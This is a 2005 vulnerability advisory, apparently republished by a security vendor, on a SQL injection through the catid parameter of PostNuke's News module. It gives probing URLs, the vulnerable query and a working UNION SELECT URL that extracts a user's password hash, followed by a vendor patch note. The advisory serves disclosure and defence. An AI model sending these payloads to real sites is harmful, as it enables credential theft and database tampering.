PostNuke funcs.php Script Remote SQL Injection Vulnerability
Author:
Source:

Published: 2005-02-28
Updated: 2005-03-01

Affected systems:

PostNuke PostNuke Phoenix 0.760-RC2

Description:


PostNuke is a widely used website creation and management tool that can use many database engines as its back end, such as MySQL, PostgreSQL, mSQL, Interbase and Sybase.

The getArticles() function in PostNuke's modules/News/funcs.php script does not sufficiently filter user-supplied parameters. A remote attacker can exploit this to perform SQL injection, potentially disclosing sensitive information or modifying the database.

Because the catid value is concatenated into the query unquoted (it is expected to be numeric), SQL can be appended through the catid variable wherever this function is reached. Supplying a stray quote produces a database error that confirms the injection point, for example:

http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3


Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

For reference, the $query variable built by getArticles() is (note that the injected value lands directly after pn_catid= with no quoting or casting):

- ---------------
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext", \
pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS \
"cid", pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments", \
pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext", \
pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", \
pn__stories.pn_sid AS "sid", pn__stories.pn_themeoverride AS "themeoverride", \
pn__topics.pn_topicid AS "tid", pn__stories.pn_time AS "time", pn__stories.pn_title \
AS "title", pn__topics.pn_topicname AS "topicname", pn__topics.pn_topicimage AS \
"topicimage", pn__topics.pn_topictext AS "topictext", pn__topics.pn_counter AS \
"tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm AS "withcomm" \
FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid = \
pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = \
pn__topics.pn_topicid WHERE (pn__stories.pn_language  ='eng' OR \
pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY \
                pn__stories.pn_time DESC
- ---------------

This vulnerability can be used to obtain the password hash of the user with uid=2:

Step 1.
http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual \
that corresponds to your MySQL server version for the right syntax to use near \
                ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

The error message reveals the column prefix (pn_ here) and the table naming scheme, which are needed to build the UNION query. The injected SELECT must return exactly as many columns as the original getArticles() query (21); pn_pass is placed in the 15th position, which is the column aliased "title", so the hash is rendered where the story title would normally appear. [$PREFIX] must be replaced with the table prefix of the target installation:

Step 2.
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*


<* Source: Maksymilian Arciemowicz (max@jestsuper.pl)

   Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110962819232255&w=2
*>

Recommendation:


Vendor patch:

PostNuke
--------
The vendor has released an upgrade that fixes this issue. Please download it from the vendor's home page:

http://www.postnuke.com/

Copyright (c) 2008-2011 Beijing Guanqun Jinchen Software Co., Ltd. (kill.com.cn). All rights reserved.